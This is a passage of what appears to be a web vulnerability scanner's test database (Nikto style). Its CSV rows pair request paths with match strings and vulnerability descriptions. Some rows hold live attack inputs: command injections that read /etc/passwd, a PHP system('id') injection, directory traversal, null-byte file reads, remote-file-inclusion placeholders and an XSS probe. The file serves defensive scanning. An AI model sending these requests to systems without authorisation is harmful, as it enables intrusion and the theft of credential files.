may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.\",\"\",\"\"\n\"000025\",\"0\",\"1\",\"@CGIDIRShandler.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Variation of Irix Handler? Has been seen from other CGI scanners.\",\"\",\"\"\n\"000026\",\"0\",\"28\",\"@CGIDIRSfinger\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"finger other users, may be other commands?\",\"\",\"\"\n\"000027\",\"0\",\"28\",\"@CGIDIRSfinger.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"finger other users, may be other commands?\",\"\",\"\"\n\"000028\",\"0\",\"3\",\"@CGIDIRSformmail.cgi\",\"GET\",\"Matt\\sWright\",\"\",\"\",\"\",\"\",\"The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.\",\"\",\"\"\n\"000030\",\"0\",\"3\",\"@CGIDIRSformmail\",\"GET\",\"Matt\\sWright\",\"\",\"\",\"\",\"\",\"The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.\",\"\",\"\"\n\"000031\",\"0\",\"3\",\"@CGIDIRSget32.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This can allow attackers to execute arbitrary commands remotely.\",\"\",\"\"\n\"000032\",\"0\",\"3\",\"@CGIDIRSgm-authors.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"GreyMatter 'password' file, that controls who can post. This contains login and password information and is installed mode 666 by default. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.\",\"\",\"\"\n\"000033\",\"0\",\"3\",\"@CGIDIRSguestbook/passwd\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"GuestBook r4 from lasource.r2.ru stores the admin password in a plain text file.\",\"\",\"\"\n\"000034\",\"3233\",\"3\",\"@CGIDIRShorde/test.php?mode=phpinfo\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"Horde allows phpinfo() to be run, which gives detailed system information.\",\"\",\"\"\n\"000035\",\"0\",\"3\",\"@CGIDIRSphoto/protected/manage.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"My Photo Gallery management interface. May allow full access to photo galleries and more. Versions before 3.8 allowed anyone to view contents of any directory on systems.\",\"\",\"\"\n\"000036\",\"0\",\"3\",\"@CGIDIRSwrap.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"possible variation: comes with IRIX 6.2; allows to view directories\",\"\",\"\"\n\"000037\",\"0\",\"3\",\"/./\",\"GET\",\"include\\\\\\(\\\"\",\"\",\"\",\"\",\"\",\"Appending '/./' to a directory may reveal PHP source code.\",\"\",\"\"\n\"000038\",\"637\",\"23\",\"/~root/\",\"GET\",\"200\",\"\",\"\",\"rtsptext\",\"\",\"Allowed to browse root's home directory.\",\"\",\"\"\n\"000039\",\"0\",\"3\",\"/cgi-bin/wrap\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"comes with IRIX 6.2; allows to view directories\",\"\",\"\"\n\"000040\",\"0\",\"3\",\"/forums/@ADMINconfig.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"PHP Config file may contain database IDs and passwords.\",\"\",\"\"\n\"000041\",\"0\",\"3\",\"/forums/config.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"PHP Config file may contain database IDs and passwords.\",\"\",\"\"\n\"000042\",\"0\",\"3\",\"/ganglia/\",\"GET\",\"Cluster\",\"\",\"\",\"\",\"\",\"Ganglia Cluster reports reveal detailed information.\",\"\",\"\"\n\"000043\",\"0\",\"3\",\"/guestbook/guestbookdat\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"PHP-Gastebuch 1.60 Beta reveals sensitive information about its configuration.\",\"\",\"\"\n\"000044\",\"0\",\"3\",\"/guestbook/pwd\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"PHP-Gastebuch 1.60 Beta reveals the md5 hash of the admin password.\",\"\",\"\"\n\"000045\",\"0\",\"3\",\"/help/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Help directory should not be accessible\",\"\",\"\"\n\"000046\",\"2411\",\"3\",\"/hola/admin/cms/htmltags.php?datei=./sec/data.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"hola-cms-1.2.9-10 may reveal the administrator ID and password.\",\"\",\"\"\n\"000047\",\"0\",\"3\",\"/horde/imp/test.php\",\"GET\",\"Horde Versions\",\"\",\"\",\"\",\"\",\"Horde script reveals detailed system/Horde information.\",\"\",\"\"\n\"000048\",\"3233\",\"3\",\"/horde/test.php?mode=phpinfo\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"Horde allows phpinfo() to be run, which gives detailed system information.\",\"\",\"\"\n\"000049\",\"3233\",\"3\",\"/imp/horde/test.php?mode=phpinfo\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"Horde allows phpinfo() to be run, which gives detailed system information.\",\"\",\"\"\n\"000050\",\"0\",\"3\",\"/imp/horde/test.php\",\"GET\",\"Horde Versions\",\"\",\"\",\"\",\"\",\"Horde script reveals detailed system/Horde information.\",\"\",\"\"\n\"000051\",\"0\",\"3\",\"/index.html.bak\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"The remote server (perhaps Web602) shows directory indexes if .bak is appended to the request.\",\"\",\"\"\n\"000052\",\"0\",\"3\",\"/index.html~\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"The remote server (perhaps Web602) shows directory indexes if a ~ is appended to the request.\",\"\",\"\"\n\"000053\",\"621\",\"7\",\"/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc\",\"GET\",\"resolv\\.conf\",\"\",\"\",\"\",\"\",\"phpMyExplorer allows attackers to read directories on the server.\",\"\",\"\"\n\"000054\",\"8103\",\"23\",\"/global.inc\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"PHP-Survey's include file should not be available via the web. Configure the web server to ignore .inc files or change this to global.inc.php\",\"\",\"\"\n\"000055\",\"0\",\"3b\",\"@CGIDIRSformmail.pl\",\"GET\",\"Matt\\sWright\",\"\",\"\",\"\",\"\",\"Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.\",\"\",\"\"\n\"000056\",\"0\",\"3b\",\"@CGIDIRShorde/test.php\",\"GET\",\"Horde Versions\",\"\",\"\",\"\",\"\",\"Horde script reveals detailed system/Horde information.\",\"\",\"\"\n\"000057\",\"59620\",\"4\",\"/inc/common.load.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.\",\"\",\"\"\n\"000058\",\"59619\",\"4\",\"/inc/config.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.\",\"\",\"\"\n\"000059\",\"59618\",\"4\",\"/inc/dbase.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.\",\"\",\"\"\n\"000060\",\"0\",\"6\",\"@CGIDIRSvisadmin.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI allows an attacker to crash the web server. Remove it from the CGI directory.\",\"\",\"\"\n\"000061\",\"0\",\"7\",\"@CGIDIRShtml2chtml.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Html2Wml < 0.4.8 access local files via CGI, and more\",\"\",\"\"\n\"000062\",\"0\",\"7\",\"@CGIDIRShtml2wml.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Html2Wml < 0.4.8 access local files via CGI, and more\",\"\",\"\"\n\"000063\",\"358\",\"7\",\"@CGIDIRSpollit/Poll_It_SSI_v2.0.cgi?data_dir=\\etc\\passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Poll_It_SSI_v2.0.cgi allows attackers to retrieve arbitrary files.\",\"\",\"\"\n\"000064\",\"0\",\"8\",\"@CGIDIRSecho.bat?&dir+c:\\\\\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This batch file may allow attackers to execute remote commands.\",\"\",\"\"\n\"000065\",\"0\",\"8\",\"@CGIDIRSexcite;IFS=\\\"$\\\";/bin/cat /etc/passwd\",\"GET\",\"root:\",\"\",\"200\",\"\",\"\",\"Excite software is vulnerable to command execution.\",\"\",\"\"\n\"000066\",\"56\",\"8\",\"@CGIDIRSezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"EZShopper loadpage CGI command execution\",\"\",\"\"\n\"000067\",\"0\",\"8\",\"@CGIDIRSguestbook.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"May allow attackers to execute commands as the web daemon.\",\"\",\"\"\n\"000068\",\"0\",\"8\",\"@CGIDIRSguestbook.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"May allow attackers to execute commands as the web daemon.\",\"\",\"\"\n\"000069\",\"0\",\"8\",\"@CGIDIRSss\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.\",\"\",\"\"\n\"000070\",\"14026\",\"8\",\"/forumdisplay.php?GLOBALS\\[\\]=1&f=2&comma=\\\".system\\('id'\\)\\.\\\"\",\"GET\",\"uid=0\",\"\",\"\",\"\",\"\",\"VBulletin forumdisplay.php remote command execution.\",\"\",\"\"\n\"000071\",\"2889\",\"8\",\"/guestbook/guestbook.html\",\"GET\",\"Jason Maloney\",\"\",\"\",\"\",\"\",\"Jason Maloney CGI Guestbook 3.0 allows remote code execution. Bugtraq 2003-12-01\",\"\",\"\"\n\"000072\",\"0\",\"8\",\"/html/cgi-bin/cgicso?query=AAA\",\"GET\",\"400 Required field missing: fingerhost\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to execute remote commands.\",\"\",\"\"\n\"000073\",\"2703\",\"9\",\"/geeklog/users.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Geeklog prior to 1.3.8-1sr2 contains a SQL injection vulnerability that lets a remote attacker reset admin password.\",\"\",\"\"\n\"000074\",\"8204\",\"a\",\"/gb/index.php?login=true\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"gBook may allow admin login by setting the value 'login' equal to 'true'.\",\"\",\"\"\n\"000075\",\"0\",\"a\",\"/guestbook/admin.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Guestbook admin page available without authentication.\",\"\",\"\"\n\"000076\",\"0\",\"b\",\"@CGIDIRSgH.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Web backdoor by gH\",\"\",\"\"\n\"000077\",\"0\",\"b\",\"@CGIDIRSgm-cplog.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"GreyMatter log file defaults to mode 666 and contains login and passwords used to update the GM site. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.\",\"\",\"\"\n\"000078\",\"0\",\"b\",\"/getaccess\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This may be an indication that the server is running getAccess for SSO\",\"\",\"\"\n\"000079\",\"0\",\"b\",\"/help.html\",\"GET\",\"nice little interface into SPIKE\",\"\",\"\",\"\",\"\",\"SPIKE Proxy may be running. Try using this port as a proxy, and see http://www.immunitysec.com/\",\"\",\"\"\n\"000080\",\"0\",\"3b\",\"@CGIDIRSgm.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"GreyMatter blogger may reveal user IDs/passwords through a gmrightclick-######.reg files (# are numbers), possibly in /archive or other archive location. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.\",\"\",\"\"\n\"000081\",\"5292\",\"c\",\"/filemanager/filemanager_forms.php?lib_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"Some versions of PHProjekt allow remote file inclusions. Verify the current version is running. See http://www.securiteam.com/unixfocus/5PP0F1P6KS.html for more info\",\"\",\"\"\n\"000082\",\"0\",\"1e\",\"@CGIDIRSAT-admin.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin interface...\",\"\",\"\"\n\"000083\",\"17111\",\"23\",\"@CGIDIRSauth_data/auth_user_file.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.\",\"\",\"\"\n\"000084\",\"0\",\"23\",\"@CGIDIRSawstats.pl\",\"GET\",\"Traffic\",\"\",\"\",\"\",\"\",\"AWStats logfile analyzer.\",\"\",\"\"\n\"000085\",\"0\",\"23\",\"@CGIDIRSawstats/awstats.pl\",\"GET\",\"Traffic\",\"\",\"\",\"\",\"\",\"Free realtime logfile analyzer for advanced web statistics. Should be protected.\",\"\",\"\"\n\"000086\",\"0\",\"23b\",\"@CGIDIRSblog/mt.cfg\",\"GET\",\"configuration file\",\"\",\"\",\"\",\"\",\"Movable Type configuration file found. Should not be available remotely.\",\"\",\"\"\n\"000087\",\"2686\",\"3\",\"@CGIDIRScart.pl?db='\",\"GET\",\"c:\\\\\\\\\",\"\",\"\",\"\",\"\",\"Dansie Shopping Cart reveals the full path to the CGI directory.\",\"\",\"\"\n\"000088\",\"2686\",\"3\",\"@CGIDIRScart.pl?db='\",\"GET\",\"d:\\\\\\\\\",\"\",\"\",\"\",\"\",\"Dansie Shopping Cart reveals the full path to the CGI directory.\",\"\",\"\"\n\"000089\",\"292\",\"3\",\"@CGIDIRShtsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=\",\"GET\",\"ht:\\\\\\/\\\\\\/Dig\",\"\",\"\",\"\",\"\",\"The ht://Dig install may reveal the path to its configuration files, revealing sensitive information about the server.\",\"\",\"\"\n\"000090\",\"0\",\"3\",\"@CGIDIRSmt-static/mt-check.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.\",\"\",\"\"\n\"000091\",\"0\",\"3\",\"@CGIDIRSmt/mt-check.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.\",\"\",\"\"\n\"000092\",\"0\",\"3\",\"/cfdocs/expeval/openfile.cfm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Can use to expose the system/server path.\",\"\",\"\"\n\"000093\",\"0\",\"3\",\"/index.php/123\",\"GET\",\"Premature end of script headers\",\"\",\"\",\"\",\"\",\"Some versions of PHP reveal PHP's physical path on the server by appending /123 to the PHP file name.\",\"\",\"\"\n\"000094\",\"7510\",\"3\",\"/mambo/index.php?Itemid=JUNK(5)\",\"GET\",\"exceeded in \\/\",\"\",\"\",\"\",\"\",\"Mambo Site Server 4.0.11 reveals the web server path.\",\"\",\"\"\n\"000095\",\"23654\",\"3\",\"/profile.php?u=JUNK(8)\",\"GET\",\"Warning:\",\"\",\"\",\"\",\"\",\"Powerboards is vulnerable to path disclosure.\",\"\",\"\"\n\"000096\",\"0\",\"3\",\"/ticket.php?id=99999\",\"GET\",\"expects first argument\",\"\",\"\",\"\",\"\",\"ZenTrack from http://zentrack.phpzen.net/ versions v2.0.3, v2.0.2beta and older reveal the web root with certain errors.\",\"\",\"\"\n\"000097\",\"4911\",\"3\",\"/vgn/login/1,501,,00.html?cookieName=x--\\>\",\"GET\",\"value=\\\"x--\",\"\",\"\",\"\",\"\",\"Vignette server may leak memory with an invalid request. Upgrade to the latest version.\",\"\",\"\"\n\"000098\",\"0\",\"3\",\"/a%5c.aspx\",\"GET\",\"Invalid file name for monitoring:\",\"\",\"\",\"\",\"\",\"Older Microsoft .NET installations allow full path disclosure.\",\"\",\"\"\n\"000099\",\"0\",\"7\",\"@CGIDIRSbanner.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI may allow attackers to read any file on the system.\",\"\",\"\"\n\"000100\",\"0\",\"7\",\"@CGIDIRSbannereditor.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI may allow attackers to read any file on the system.\",\"\",\"\"\n\"000101\",\"599\",\"7\",\"@CGIDIRSbook.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read arbitrary files on the server.\",\"\",\"\"\n\"000102\",\"0\",\"7e\",\"/admin/browse.asp?FilePath=c:\\&Opt=2&level=0\",\"GET\",\"winnt\",\"\",\"\",\"\",\"\",\"Hosting Controller from hostingcontroller.com allows any file on the system to be read remotely.\",\"\",\"\"\n\"000103\",\"0\",\"8\",\"@CGIDIRSarchitext_query.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.\",\"\",\"\"\n\"000104\",\"0\",\"8\",\"@CGIDIRSbizdb1-search.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI may allow attackers to execute commands remotely. See http://www.hack.co.za/daem0n/cgi/cgi/bizdb.htm\",\"\",\"\"\n\"000105\",\"0\",\"b\",\"@CGIDIRSblog/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"A blog was found. May contain security problems in CGIs, weak passwords, and more.\",\"\",\"\"\n\"000106\",\"0\",\"b\",\"/tsweb/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Microsoft TSAC found. http://www.dslwebserver.com/main/fr_index.html?/main/sbs-Terminal-Services-Advanced-Client-Configuration.html\",\"\",\"\"\n\"000107\",\"0\",\"1b\",\"@CGIDIRSblog/mt-load.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Movable Type weblog installation CGI found. May be able to reconfigure or reload.\",\"\",\"\"\n\"000108\",\"14538\",\"c\",\"@CGIDIRSatk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"Achievo can be made to include PHP files from another domain. Upgrade to a new version.\",\"\",\"\"\n\"000109\",\"0\",\"23e\",\"/vgn/performance/TMT\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000110\",\"0\",\"23e\",\"/vgn/performance/TMT/Report\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000111\",\"0\",\"23e\",\"/vgn/performance/TMT/Report/XML\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000112\",\"0\",\"23e\",\"/vgn/performance/TMT/reset\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000113\",\"0\",\"23e\",\"/vgn/ppstats\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000114\",\"0\",\"23e\",\"/vgn/previewer\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000115\",\"0\",\"23e\",\"/vgn/record/previewer\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000116\",\"0\",\"23e\",\"/vgn/stylepreviewer\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000117\",\"0\",\"23e\",\"/vgn/vr/Deleting\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000118\",\"0\",\"23e\",\"/vgn/vr/Editing\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000119\",\"0\",\"23e\",\"/vgn/vr/Saving\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000120\",\"0\",\"23e\",\"/vgn/vr/Select\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000121\",\"0\",\"23\",\"/scripts/iisadmin/bdir.htr\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This default script shows host info, may allow file browsing and buffer a overrun in the Chunked Encoding data transfer mechanism, request /scripts/iisadmin/bdir.htr??c:\\<dirs> . MS02-028. CA-2002-09.\",\"\",\"\"\n\"000122\",\"0\",\"2a\",\"/scripts/iisadmin/ism.dll\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Allows you to mount a brute force attack on passwords\",\"\",\"\"\n\"000123\",\"0\",\"2a\",\"/scripts/tools/ctss.idc\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI allows remote users to view and modify SQL DB contents, server paths, docroot and more.\",\"\",\"\"\n\"000124\",\"0\",\"3\",\"/bigconf.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Big-IP Configuration CGI\",\"\",\"\"\n\"000125\",\"0\",\"3\",\"/billing/billing.apw\",\"GET\",\"PASS BOX CAPTION:\",\"\",\"\",\"\",\"\",\"CoffeeCup password wizard allows password files to be read remotely.\",\"\",\"\"\n\"000126\",\"0\",\"3\",\"/blah_badfile.shtml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call.\",\"<!--#include virtual=\\\"/index.jsp\\\"-->\",\"\"\n\"000127\",\"0\",\"3\",\"/blah-whatever-badfile.jsp\",\"GET\",\"Script \\/\",\"\",\"\",\"\",\"\",\"The web server is configured to respond with the web server path when requesting a non-existent .jsp file.\",\"\",\"\"\n\"000128\",\"4910\",\"3\",\"/vgn/style\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette server may reveal system information through this file.\",\"\",\"\"\n\"000129\",\"0\",\"3\",\"/scripts/no-such-file.pl\",\"GET\",\"perl script\",\"\",\"\",\"\",\"\",\"Using perl.exe allows attackers to view host info. Use perlis.dll instead.\",\"\",\"\"\n\"000130\",\"17653\",\"3\",\"/SiteServer/Admin/commerce/foundation/domain.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Displays known domains of which that server is involved.\",\"\",\"\"\n\"000131\",\"17654\",\"3\",\"/SiteServer/Admin/commerce/foundation/driver.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Displays a list of installed ODBC drivers.\",\"\",\"\"\n\"000132\",\"17655\",\"3\",\"/SiteServer/Admin/commerce/foundation/DSN.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Displays all DSNs configured for selected ODBC drivers.\",\"\",\"\"\n\"000133\",\"17652\",\"3\",\"/SiteServer/admin/findvserver.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Gives a list of installed Site Server components.\",\"\",\"\"\n\"000134\",\"0\",\"3\",\"/SiteServer/Admin/knowledge/dsmgr/default.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Used to view current search catalog configurations\",\"\",\"\"\n\"000135\",\"1909\",\"4\",\"@CGIDIRScgiwrap/%3Cfont%20color=red%3E\",\"GET\",\"<font color=red>\",\"\",\"\",\"\",\"\",\"cgiwrap allows HTML and possibly XSS injection. See http://archives.neohapsis.com/archives/bugtraq/2001-07/0499.html for details.\",\"\",\"\"\n\"000136\",\"2878\",\"4\",\"@CGIDIRSmoin.cgi?test\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"MoinMoin 1.1 and prior contain at least two XSS vulnerabilities. Version 1.0 and prior also contains a XSLT related vulnerability\",\"\",\"\"\n\"000138\",\"0\",\"4\",\"/basilix/mbox-list.php3\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'message list' function/page\",\"\",\"\"\n\"000139\",\"0\",\"4\",\"/basilix/message-read.php3\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'read message' function/page\",\"\",\"\"\n\"000140\",\"0\",\"4\",\"/clusterframe.jsp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Macromedia JRun 4 build 61650 remote administration interface is vulnerable to several XSS attacks.\",\"\",\"\"\n\"000141\",\"0\",\"4\",\"/IlohaMail/blank.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"IlohaMail 0.8.10 contains a XSS vulnerability. Previous versions contain other non-descript vulnerabilities.\",\"\",\"\"\n\"000142\",\"0\",\"8\",\"/bb-dnbd/faxsurvey\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This may allow arbitrary command execution.\",\"\",\"\"\n\"000143\",\"0\",\"8\",\"/cartcart.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"If this is Dansie Shopping Cart 3.0.8 or earlier, it contains a backdoor to allow attackers to execute arbitrary commands.\",\"\",\"\"\n\"000144\",\"6591\",\"8\",\"/scripts/Carello/Carello.dll\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Carello 1.3 may allow commands to be executed on the server by replacing hidden form elements. This could not be tested by Nikto.\",\"\",\"\"\n\"000145\",\"0\",\"a\",\"/scripts/tools/dsnform.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Allows creation of ODBC Data Source\",\"\",\"\"\n\"000146\",\"0\",\"a\",\"/scripts/tools/dsnform\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Allows creation of ODBC Data Source\",\"\",\"\"\n\"000147\",\"17656\",\"a\",\"/SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Used to create, modify, and potentially delete LDAP users and groups.\",\"\",\"\"\n\"000148\",\"17657\",\"a\",\"/SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Used to create, modify, and potentially delete LDAP users and groups.\",\"\",\"\"\n\"000149\",\"0\",\"b\",\"/prd.i/pgen/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Has MS Merchant Server 1.0\",\"\",\"\"\n\"000150\",\"0\",\"b\",\"/readme.eml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Remote server may be infected with the Nimda virus.\",\"\",\"\"\n\"000151\",\"0\",\"b\",\"/scripts/httpodbc.dll\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Possible IIS backdoor found.\",\"\",\"\"\n\"000152\",\"0\",\"b\",\"/scripts/proxy/w3proxy.dll\",\"GET\",\"502\",\"\",\"\",\"\",\"\",\"MSProxy v1.0 installed\",\"\",\"\"\n\"000153\",\"0\",\"b\",\"/scripts/root.exe?/c+dir+c:\\+/OG\",\"GET\",\"Directory of c\",\"\",\"\",\"\",\"\",\"This machine is infected with Code Red, or has Code Red leftovers.\",\"\",\"\"\n\"000154\",\"0\",\"be\",\"/SiteServer/admin/\",\"GET\",\"403\",\"\",\"\",\"\",\"\",\"Site Server components admin. Default account may be 'LDAP_Anonymous', pass is 'LdapPassword_1'. see http://www.wiretrip.net/rfp/p/doc.asp/i1/d69.htm\",\"\",\"\"\n\"000155\",\"0\",\"1\",\"/siteseed/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Siteseed pre 1.4.2 has 'major' security problems.\",\"\",\"\"\n\"000156\",\"0\",\"2\",\"/scripts/samples/search/author.idq\",\"GET\",\"The template file can not be found in the location specified\",\"\",\"\",\"\",\"\",\"This is a default IIS script/file that should be removed. MS01-033.\",\"\",\"\"\n\"000157\",\"0\",\"2\",\"/scripts/samples/search/filesize.idq\",\"GET\",\"The template file can not be found in the location specified\",\"\",\"\",\"\",\"\",\"This is a default IIS script/file that should be removed. MS01-033.\",\"\",\"\"\n\"000158\",\"0\",\"2\",\"/scripts/samples/search/filetime.idq\",\"GET\",\"The template file can not be found in the location specified\",\"\",\"\",\"\",\"\",\"This is a default IIS script/file that should be removed. MS01-033.\",\"\",\"\"\n\"000159\",\"0\",\"2\",\"/scripts/samples/search/queryhit.idq\",\"GET\",\"The template file can not be found in the location specified\",\"\",\"\",\"\",\"\",\"This is a default IIS script/file that should be removed. MS01-033.\",\"\",\"\"\n\"000160\",\"0\",\"2\",\"/scripts/samples/search/simple.idq\",\"GET\",\"The template file can not be found in the location specified\",\"\",\"\",\"\",\"\",\"This is a default IIS script/file that should be removed. MS01-033.\",\"\",\"\"\n\"000161\",\"0\",\"23\",\"/pccsmysqladm/incs/dbconnect.inc\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This file should not be accessible, as it contains database connectivity information. Upgrade to version 1.2.5 or higher.\",\"\",\"\"\n\"000162\",\"0\",\"23e\",\"/iisadmin/\",\"GET\",\"200\",\"\",\"\",\"is restricted to Localhost\",\"\",\"Access to /iisadmin should be restricted to localhost or allowed hosts only.\",\"\",\"\"\n\"000163\",\"51201\",\"3\",\"/password.inc\",\"GET\",\"globalpw\",\"\",\"\",\"\",\"\",\"GTCatalog 0.9 admin password was retrieved remotely.\",\"\",\"\"\n\"000164\",\"0\",\"3\",\"/PDG_Cart/oder.log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Shopping cart software 